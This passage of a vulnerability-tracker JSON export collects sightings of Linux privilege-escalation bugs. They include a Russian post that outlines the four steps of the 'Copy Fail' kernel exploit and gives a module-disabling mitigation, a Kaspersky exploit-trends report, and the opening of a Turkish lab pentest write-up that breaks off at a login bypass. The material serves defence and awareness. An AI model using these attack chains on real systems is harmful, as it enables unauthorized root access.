\u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u0442\u043e\u0433\u043e \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0430, \u043d\u043e \u0432 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041e\u043f\u0442\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0430 \u043c\u0435\u0441\u0442\u0435 2017 \u0433\u043e\u0434\u0430 \u0432 algif_aead \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043a\u044d\u0448\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 AEAD, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG.\n\n\u041d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0437\u0430\u0442\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c splice() \u0432 \u044d\u0442\u043e\u043c \u0441\u043e\u043a\u0435\u0442\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043e\u043d \u043d\u0435 \u0432\u043b\u0430\u0434\u0435\u0435\u0442\u00bb.\n\n\u041e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0447\u0435\u0442\u043a\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438 \u0438\u043b\u0438 \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u0432 Xint.io \u0435\u0435 \u0441\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u044c\u043c\u044f \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0447\u0442\u0438 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u0432\u043c\u0435\u0441\u0442\u0435: \u043f\u043e\u0440\u0442\u0430\u0442\u0438\u0432\u043d\u0430, \u043c\u0438\u043d\u0438\u0430\u0442\u044e\u0440\u043d\u0430, \u0441\u043a\u0440\u044b\u0442\u043d\u0430 \u0438 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u0430 \u0441 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430\u043c\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0443\u0440\u043e\u0432\u043d\u044f \u0435\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u041e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0443 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux.", "creation_timestamp": "2026-04-30T11:37:09.000000Z"}, {"uuid": "1f532012-ddcd-4f6c-adba-f5a558101986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/ptescalator/714", "content": "Copy.Fail \ud83d\udc27\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 2017 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-31431, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u043e\u0439, \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0447\u0435\u0442\u044b\u0440\u0435\u0445 \u0448\u0430\u0433\u043e\u0432:\n\n1\ufe0f\u20e3 \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0438 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 AEAD-\u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\n2\ufe0f\u20e3 \u0427\u0435\u0440\u0435\u0437 splice() \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0431\u0443\u0444\u0435\u0440 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438;\n\n3\ufe0f\u20e3 \u041e\u0448\u0438\u0431\u043a\u0430 \u0432 authencesn \u0434\u0430\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u044c 4 \u0431\u0430\u0439\u0442 \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0431\u0443\u0444\u0435\u0440\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430;\n\n4\ufe0f\u20e3 \u042f\u0434\u0440\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 setuid-\u0444\u0430\u0439\u043b \u0438\u0437 \u043a\u044d\u0448\u0430 \u2192 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\n\n\u0414\u0430\u043d\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u0441\u0445\u043e\u0436\u0430 \u0441 Dirty Pipe (CVE-2022-0847), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0432\u044b\u0437\u043e\u0432\u044b:\n\n\u2022 pipe \u2014 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043e\u0434\u043d\u043e\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445;\n\n\u2022 splice \u2014 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u043c\u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\u0422\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u041f\u041e \u0432 \u043e\u0431\u0440\u0430\u0437\u0435 Astra Linux, \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Copy Fail \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u0435\u0449\u0435 \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u044d\u0442\u043e\u043c\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e suid-\u0444\u0430\u0439\u043b\u044b, \u043d\u043e \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0434\u0435\u043b\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c\u0438.\n\n\u041a\u0430\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \ud83d\udd27\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442\u0435 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u2014 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 \u044f\u0434\u0440\u043e. \u041f\u0430\u0442\u0447 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 a664bf3d603d. \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0441 29 \u0430\u043f\u0440\u0435\u043b\u044f. \u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430.\n\n\u0415\u0441\u043b\u0438 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u2014 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f \u043c\u0435\u0440\u0430: \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c algif_aead:\n\n\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\n\nrmmod algif_aead 2>/dev/null\n\n#cve #tip\n@ptescalator", "creation_timestamp": "2026-04-30T14:57:47.000000Z"}, {"uuid": "1a86d5b5-381e-4ab4-b616-d6deba51cd62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e8c8129d-b09e02c4de9c4f4a", "content": "Exploits and vulnerabilities in Q1 2026\nDuring Q1 2026, the exploit kits leveraged by threat actors to target user systems expanded once again, incorporating new exploits for the Microsoft Office platform, as well as Windows and Linux operating systems.\nIn this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged by popular C2 frameworks throughout Q1 2026.\nStatistics on registered vulnerabilities\nThis section provides statistical data on registered vulnerabilities. The data is sourced from cve.org.\nWe examine the number of registered CVEs for each month starting from January 2022. The total volume of vulnerabilities continues rising and, according to current reports, the use of AI agents for discovering security issues is expected to further reinforce this upward trend.\nTotal published vulnerabilities per month from 2022 through 2026 (download)\nNext, we analyze the number of new critical vulnerabilities (CVSS > 8.9) over the same period.\nTotal critical vulnerabilities published per month from 2022 through 2026 (download)\nThe graph indicates that while the volume of critical vulnerabilities slightly decreased compared to previous years, an upward trend remained clearly visible. At present, we attribute this to the fact that the end of last year was marked by the disclosure of several severe vulnerabilities in web frameworks. The current growth is driven by high-profile issues like React2Shell, the release of exploit frameworks for mobile platforms, and the uncovering of secondary vulnerabilities during the remediation of previously discovered ones. We will be able to test this hypothesis in the next quarter; if correct, the second quarter will show a significant decline, similar to the pattern observed in the previous year.\nExploitation statistics\nThis section presents statistics on vulnerability exploitation for Q1 2026. The data draws on open sources and our telemetry.\nWindows and Linux vulnerability exploitation\nIn Q1 2026, threat actor toolsets were updated with exploits for new, recently registered vulnerabilities. However, we first examine the list of veteran vulnerabilities that consistently account for the largest share of detections:\n\nCVE-2018-0802: a remote code execution (RCE) vulnerability in the Equation Editor component\nCVE-2017-11882: another RCE vulnerability also affecting Equation Editor\nCVE-2017-0199: a vulnerability in Microsoft Office and WordPad that allows an attacker to gain control over the system\nCVE-2023-38831: a vulnerability resulting from the improper handling of objects contained within an archive\nCVE-2025-6218: a vulnerability allowing the specification of relative paths to extract files into arbitrary directories, potentially leading to malicious command execution\nCVE-2025-8088: a directory traversal bypass vulnerability during file extraction utilizing NTFS Streams\nAmong the newcomers, we have observed exploits targeting the Microsoft Office platform and Windows OS components. Notably, these new vulnerabilities exploit logic flaws arising from the interaction between multiple systems, making them technically difficult to isolate within a specific file or library. A list of these vulnerabilities is provided below:\n\nCVE-2026-21509 and CVE-2026-21514: security feature bypass vulnerabilities: despite Protected View being enabled, a specially crafted file can still execute malicious code without the user\u2019s knowledge. Malicious commands are executed on the victim\u2019s system with the privileges of the user who opened the file.\nCVE-2026-21513: a vulnerability in the Internet Explorer MSHTML engine, which is used to open websites and render HTML markup. The vulnerability involves bypassing rules that restrict the execution of files from untrusted network sources. Interestingly, the data provider for this vulnerability was an LNK file.\nThese three vulnerabilities were utilized together in a single chain during attacks on Windows-based user systems. While this combination is noteworthy, we believe the widespread use of the entire chain as a unified exploit will likely decline due to its instability. We anticipate that these vulnerabilities will eventually be applied individually as initial entry vectors in phishing campaigns.\nBelow is the trend of exploit detections on user Windows systems starting from Q1 2025.\nDynamics of the number of Windows users encountering exploits, Q1 2025 \u2013 Q1 2026. The number of users who encountered exploits in Q1 2025 is taken as 100% (download)\nThe vulnerabilities listed here can be leveraged to gain initial access to a vulnerable system and for privilege escalation. This underscores the critical importance of timely software updates.\nOn Linux devices, exploits for the following vulnerabilities were detected most frequently:\n\nCVE-2022-0847: a vulnerability known as Dirty Pipe, which enables privilege escalation and the hijacking of running applications\nCVE-2019-13272: a vulnerability caused by improper handling of privilege inheritance, which can be exploited to achieve privilege escalation\nCVE-2021-22555: a heap out-of-bounds write vulnerability in the Netfilter kernel subsystem\nCVE-2023-32233: a vulnerability in the Netfilter subsystem that allows for Use-After-Free conditions and privilege escalation through the improper processing of network requests\nDynamics of the number of Linux users encountering exploits, Q1 2025 \u2013 Q1 2026. The number of users who encountered exploits in Q1 2025 is taken as 100% (download)\nIn the first quarter of 2026, we observed a decrease in the number of detected exploits; however, the detection rates are on the rise relative to the same period last year. For the Linux operating system, the installation of security patches remains critical.\nMost common published exploits\nThe distribution of published exploits by software type in Q1 2026 features an updated set of categories; once again, we see exploits targeting operating systems and Microsoft Office suites.\nDistribution of published exploits by platform, Q1 2026 (download)\nVulnerability exploitation in APT attacks\nWe analyzed which vulnerabilities were utilized in APT attacks during Q1 2026. The ranking provided below includes data based on our telemetry, research, and open sources.\nTOP 10 vulnerabilities exploited in APT attacks, Q1 2026 (download)\nIn Q1 2026, threat actors continued to utilize high-profile vulnerabilities registered in the previous year for APT attacks. The hypothesis we previously proposed has been confirmed: security flaws affecting web applications remain heavily exploited in real-world attacks. However, we are also observing a partial refresh of attacker toolsets. Specifically, during the first quarter of the year, APT campaigns leveraged recently discovered vulnerabilities in Microsoft Office products, edge networking device software, and remote access management systems. Although the most recent vulnerabilities are being exploited most heavily, their general characteristics continue to reinforce established trends regarding the categories of vulnerable software. Consequently, we strongly recommend applying the security patches provided by vendors.\nC2 frameworks\nIn this section, we examine the most popular C2 frameworks used by threat actors and analyze the vulnerabilities targeted by the exploits that interacted with C2 agents in APT attacks.\nThe chart below shows the frequency of known C2 framework usage in attacks against users during Q1 2026, according to open sources.\nTOP 10 C2 frameworks used by APTs to compromise user systems, Q1 2026 (download)\nMetasploit has returned to the top of the list of the most common C2 frameworks, displacing Sliver, which now shares the second position with Havoc. These are followed by Covenant and Mythic, the latter of which previously saw greater popularity. After studying open sources and analyzing samples of malicious C2 agents that contained exploits, we determined that the following vulnerabilities were utilized in APT attacks involving the C2 frameworks mentioned above:\n\nCVE-2023-46604: an insecure deserialization vulnerability allowing for arbitrary code execution within the server process context if the Apache ActiveMQ service is running\nCVE-2024-12356 and CVE-2026-1731: command injection vulnerabilities in BeyondTrust software that allow an attacker to send malicious commands even without system authentication\nCVE-2023-36884: a vulnerability in the Windows Search component that enables command execution on the system, bypassing security mechanisms built into Microsoft Office applications\nCVE-2025-53770: an insecure deserialization vulnerability in Microsoft SharePoint that allows for unauthenticated command execution on the server\nCVE-2025-8088 and CVE-2025-6218: similar directory traversal vulnerabilities that allow files to be extracted from an archive to a predefined path, potentially without the archiving utility displaying any alerts to the user\nThe nature of the described vulnerabilities indicates that they were exploited to gain initial access to the system. Notably, the majority of these security issues are targeted to bypass authentication mechanisms. This is likely due to the fact that C2 agents are being detected effectively, prompting threat actors to reduce the probability of discovery by utilizing bypass exploits.\nNotable vulnerabilities\nThis section highlights the most significant vulnerabilities published in Q1 2026 that have publicly available descriptions.\nCVE-2026-21519: Desktop Window Manager vulnerability\nAt the core of this vulnerability is a Type Confusion flaw. By attempting to access a resource within the Desktop Window Manager subsystem, an attacker can achieve privilege escalation. A necessary condition for exploiting this issue is existing authorization on the system.\nIt is worth noting that the DWM subsystem has been under close scrutiny by threat actors for quite some time. Historically, the primary attack vector involves interacting with the NtDComposition* function set.\nRegPwn (CVE-2026-21533): a system settings access control vulnerability\nCVE-2026-21533 is essentially a logic vulnerability that enables privilege escalation. It stems from the improper handling of privileges within Remote Desktop Services (RDS) components. By modifying service parameters in the registry and replacing the configuration with a custom key, an attacker can elevate privileges to the SYSTEM level. This vulnerability is likely to remain a fixture in threat actor toolsets as a method for establishing persistence and gaining high-level privileges.\nCVE-2026-21514: a Microsoft Office vulnerability\nThis vulnerability was discovered in the wild during attacks on user systems. Notably, an LNK file is used to initiate the exploitation process. CVE-2026-21514 is also a logic issue that allows for bypassing OLE technology restrictions on malicious code execution and the transmission of NetNTLM authentication requests when processing untrusted input.\nClawdbot (CVE-2026-25253): an OpenClaw vulnerability\nThis vulnerability in the AI agent leaks credentials (authentication tokens) when queried via the WebSocket protocol. It can lead to the compromise of the infrastructure where the agent is installed: researchers have confirmed the ability to access local system data and execute commands with elevated privileges. The danger of CVE-2026-25253 is further compounded by the fact that its exploitation has generated numerous attack scenarios, including the use of prompt injections and ClickFix techniques to install stealers on vulnerable systems.\nCVE-2026-34070: LangChain framework vulnerability\nLangChain is an open-source framework designed for building applications powered by large language models (LLMs). A directory traversal vulnerability allowed attackers to access arbitrary files within the infrastructure where the framework was deployed. The core of CVE-2026-34070 lies in the fact that certain functions within langchain_core/prompts/loading.py handled configuration files insecurely. This could potentially lead to the processing of files containing malicious data, which could be leveraged to execute commands and expose critical system information or other sensitive files.\nCVE-2026-22812: an OpenCode vulnerability\nCVE-2026-22812 is another vulnerability identified in AI-assisted coding software. By default, the OpenCode agent provided local access for launching authorized applications via an HTTP server that did not require authentication. Consequently, attackers could execute malicious commands on a vulnerable device with the privileges of the current user.\nConclusion and advice\nWe observe that the registration of vulnerabilities is steadily gaining momentum in Q1 2026, a trend driven by the widespread development of AI tools designed to identify security flaws across various software types. This trajectory is likely to result not only in a higher volume of registered vulnerabilities but also in an increase in exploit-driven attacks, further reinforcing the critical necessity of timely security patch deployment. Additionally, organizations must prioritize vulnerability management and implement effective defensive technologies to mitigate the risks associated with potential exploitation.\nTo ensure the rapid detection of threats involving exploit utilization and to prevent their escalation, it is essential to deploy a reliable security solution. Key features of such a tool include continuous infrastructure monitoring, proactive protection, and vulnerability prioritization based on real-world relevance. These mechanisms are integrated into Kaspersky Next, which also provides endpoint security and protection against cyberattacks of any complexity. \nsecurelist.com/vulnerabilities\u2026", "creation_timestamp": "2026-05-07T10:52:25.040848Z"}, {"uuid": "ba4e243f-f3a4-40f5-ace6-21c9d816d66f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/echobit.de/post/3mlthd2agk222", "content": "Linux is most secure OS. Yes. It's perfectly safe\u2026\n\n- Dirty Cow (CVE-2016-5195)\n- Dirty Pipe (CVE-2022-0847)\n- io_uring UAF (CVE-2022-2602)\n- Copy Fail (CVE-2026-31431)\n- Dirty Frag (CVE-2026-43284\n- Fragnesia (CVE-2026-46300)\n\n\u2026 so you have that many methods to recover your root password. \ud83d\ude02", "creation_timestamp": "2026-05-14T18:34:51.369833Z"}, {"uuid": "8122b591-dcf6-40a7-a539-453e272f6d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/the-abra/c510ddb94dda4bdce9c353a7e6d6ff04", "content": "\n# Operasyon G\u00fcnl\u00fc\u011f\u00fc: Impact (Hackviser) S\u0131zma Testi Raporu\n\nHackviser platformunda yer alan ve zorluk derecesi \"Orta\" olarak belirlenen **Impact** makinesi, temelde bir web mant\u0131k hatas\u0131ndan yola \u00e7\u0131karak Yerel Dosya \u00c7a\u011f\u0131rma (LFI) zafiyetine, oradan da kritik bir \u00e7ekirdek (kernel) a\u00e7\u0131\u011f\u0131yla tam sistem eri\u015fimine uzanan keyifli bir s\u0131zma senaryosudur. \n\nA\u015fa\u011f\u0131da, hedefe giden yolun tamamen yenilenmi\u015f ve taktiksel ad\u0131mlara b\u00f6l\u00fcnm\u00fc\u015f d\u00f6k\u00fcm\u00fcn\u00fc bulabilirsiniz.\n\n---\n\n## Faz 1: Y\u00fczey Analizi ve Ayak \u0130zi Toplama\n\nSisteme k\u00f6r\u00fc k\u00f6r\u00fcne sald\u0131rmak yerine \u00f6nce kap\u0131lar\u0131 ve pencereleri yoklayarak ba\u015fl\u0131yoruz.\n\n**A\u011f Taramas\u0131 (Port & Servisler):**\nStandart taramalar\u0131m\u0131z sonucunda hedef sistemin d\u0131\u015far\u0131ya sadece iki kap\u0131 a\u00e7t\u0131\u011f\u0131n\u0131 tespit ettik:\n*   **Port 22 (SSH):** G\u00fcvenli kabuk eri\u015fimi (\u015eimdilik elimizde ge\u00e7erli bir kimlik bilgisi yok).\n*   **Port 80 (HTTP):** Ana sald\u0131r\u0131 y\u00fczeyimiz olan web sunucusu.\n\n**Dizin Ke\u015ffi (Fuzzing):**\nWeb sunucusunun k\u00f6k dizininde ve alt klas\u00f6rlerinde neler sakland\u0131\u011f\u0131n\u0131 anlamak i\u00e7in bir kelime listesi taramas\u0131 ger\u00e7ekle\u015ftirdik. Kar\u015f\u0131m\u0131za \u00e7\u0131kan harita \u015fu \u015fekildeydi:\n*   `/login.php` (200 OK)\n*   `/index.php` (302 Y\u00f6nlendirme)\n*   `/register.php`\n*   `/webadmin/` ve alt dizinleri (`components/`, `assets/`, `tables/`)\n*   `/uploads/`\n\n---\n\n## Faz 2: Web Katman\u0131n\u0131 K\u0131rmak ve \u0130\u015flem Sahtekarl\u0131\u011f\u0131\n\n\u0130lk ad\u0131m olarak kimlik do\u011frulama formuna odakland\u0131m. Veritaban\u0131n\u0131 kand\u0131rmak i\u00e7in klasik SQL 